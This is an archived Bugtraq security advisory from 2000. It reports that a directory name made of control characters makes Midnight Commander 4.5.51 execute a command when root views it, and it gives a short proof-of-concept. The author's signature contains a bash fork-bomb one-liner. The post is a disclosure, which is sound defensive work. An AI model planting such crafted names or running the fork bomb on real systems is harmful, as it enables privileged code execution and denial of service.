Bugtraq mailing list archives
Midnight Commander
From: Michal Zalewski <lcamtuf () TPI PL>
Date: Tue, 28 Nov 2000 01:15:51 +0100
The Midnight Commander 4.5.51 (latest). $ od -t x1 mcbug 0000000 03 14 77 04 0a $ mkdir `cat mcbug` $ mc (try to view this directory - 'w' - 0x77 command will be executed; longer commands might be used, as well) Obviously, this attack requires privledged user interaction. Midnight Commander won't display full name of the directory if it's long enough, so these control characters can be easily hidden. Such problems in Midnight Commander seems to appear less or more frequently. I am affraid this pretty useful file manager should not be used in multiuser systems, especially by root (I can recall numerous problems with this utility last years - code execution when viewing specific file types, code execution via mc vfs support, etc etc) :( Workaround: well, I am affraid only code audit might help :( -- _______________________________________________________ Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =--=> Did you know that clones never use mirrors? <=--=
Current thread:
- Midnight Commander Michal Zalewski (Nov 29)